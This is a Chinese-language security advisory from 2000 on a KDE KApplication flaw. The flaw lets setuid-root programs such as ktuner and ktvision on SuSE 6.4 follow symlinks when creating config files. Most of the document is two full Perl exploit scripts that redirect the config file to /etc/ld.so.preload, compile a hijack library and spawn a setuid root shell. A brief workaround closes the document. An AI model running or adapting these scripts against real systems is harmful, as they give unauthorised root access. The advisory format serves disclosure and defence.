KDE KApplication {} 配置文件安全漏洞发布时间:2000-05-11 更新时间:2000-05-11 严重程度:高 威胁程度:权限提升 错误类型:配置错误 利用方式:服务器模式 受影响系统 SuSE 6.4详细描述 KDE在对配置文件处理上存在一个安全漏洞,KApplication类没有安全的创建配置文件,本地用户在执行setuid root的KDE程序(例如:ktvision 和 ktuner)时可以创建任意文件。这可能导致用户获得root权限。 有问题的代码在KApplication类中: KApplication::init() : ... // now for the local app config file QString aConfigName = KApplication::localkdedir(); aConfigName += "/share/config/"; aConfigName += aAppName; aConfigName += "rc"; QFile aConfigFile( aConfigName ); ... 这个类的函数中没有检查要创建的文件是不是链接,因而用户可以创建任意的系统文件,例如共享库等等,并可能进一步获得系统的控制权。 测试代码 #!/usr/bin/perl # # 7350ktuner! The ktuner-hack. # (a.k.a. kil3r for some reason :) # # Just execute. Gives instant rootshell kiddie! # If only ktuner is setuid-root and vulnerable as with # SuSE 6.4! # # When has this stupid race an end? # # Bugdiscovery is due to Sebastian Krahmer. # http://www.cs.uni-potsdam.de/homepages/students/linuxer # # # Greets as always to TESO, security.is, lam3rz ... you all # know who you are. # # my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc"; $ENV{"PATH"}.=":/opt/kde/bin"; print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n"; print "Creating hijack-lib ...\n"; open O, ">/tmp/boom.c" or die "open(boom.c..)"; print O<<_EOF_; #include <sys/types.h> int time(void *v) { chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 06755); unlink("/etc/ld.so.preload"); exit(1); } _EOF_ close O; print "Compiling hijack-lib ...\n"; `cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`; `cc -shared /tmp/boom.o -o /tmp/boom.so`; open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)"; print O<<_EOF2_; #include <stdio.h> int main() { char *a[] = {"/bin/sh", 0}; setuid(0); setregid(0, 0); execve(a[0], a, 0); return 0; } _EOF2_ close O; print "Compile shell ...\n"; `cc /tmp/boomsh.c -o /tmp/boomsh`; umask 0; unlink $rcfile; symlink "/etc/ld.so.preload", $rcfile; print "Invoking vulnerable program (ktuner)...\n"; if (fork() == 0) { `ktuner`; exit 0; } else { sleep(3); kill 9, `pidof ktuner`; } open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload."; print O "/tmp/boom.so"; close O; `/usr/bin/passwd`; # let it look like if we have sth. to do. :) sleep 3; print "Welcome. But as always: BEHAVE!\n"; system("/tmp/boomsh"); ========================= 7350ktuner end ================================ ========================= 7350ktvision begin ================================ #!/usr/bin/perl # # 7350ktvision! The ktvision-hack. # # Just execute. Gives instant rootshell kiddie! # If only ktvision is setuid-root and vulnerable as with # SuSE 6.4! # # # Bugdiscovery is due to Sebastian Krahmer. # http://www.cs.uni-potsdam.de/homepages/students/linuxer # # Greets as always to TESO, security.is, lam3rz ... you all # know who you are. # # Special greets to that beautiful black-dressed woman at # the bus stop. This one is for you. :) # my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc"; $ENV{"PATH"}.=":/opt/kde/bin"; print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n"; print "Creating hijack-lib ...\n"; open O, ">/tmp/boom.c" or die "open(boom.c..)"; print O<<_EOF_; #include <sys/types.h> int time(void *v) { chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 06755); unlink("/etc/ld.so.preload"); exit(1); } _EOF_ close O; print "Compiling hijack-lib ...\n"; `cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`; `cc -shared /tmp/boom.o -o /tmp/boom.so`; open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)"; print O<<_EOF2_; #include <stdio.h> int main() { char *a[] = {"/bin/sh", 0}; setuid(0); setregid(0, 0); execve(a[0], a, 0); return 0; } _EOF2_ close O; print "Compile shell ...\n"; `cc /tmp/boomsh.c -o /tmp/boomsh`; umask 0; unlink $rcfile; symlink "/etc/ld.so.preload", $rcfile; print "Invoking vulnerable program (ktvision)...\n"; if (fork() == 0) { `ktvision`; exit 0; } else { sleep(3); kill 9, `pidof ktvision`; } open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload."; print O "/tmp/boom.so"; close O; `/usr/bin/passwd`; # let it look like if we have sth. to do. :) sleep 3; print "Welcome. But as always: BEHAVE!\n"; system("/tmp/boomsh"); 解决方案 临时解决办法: 取消所有的KDE程序的setuid/setgid位 相关信息 |
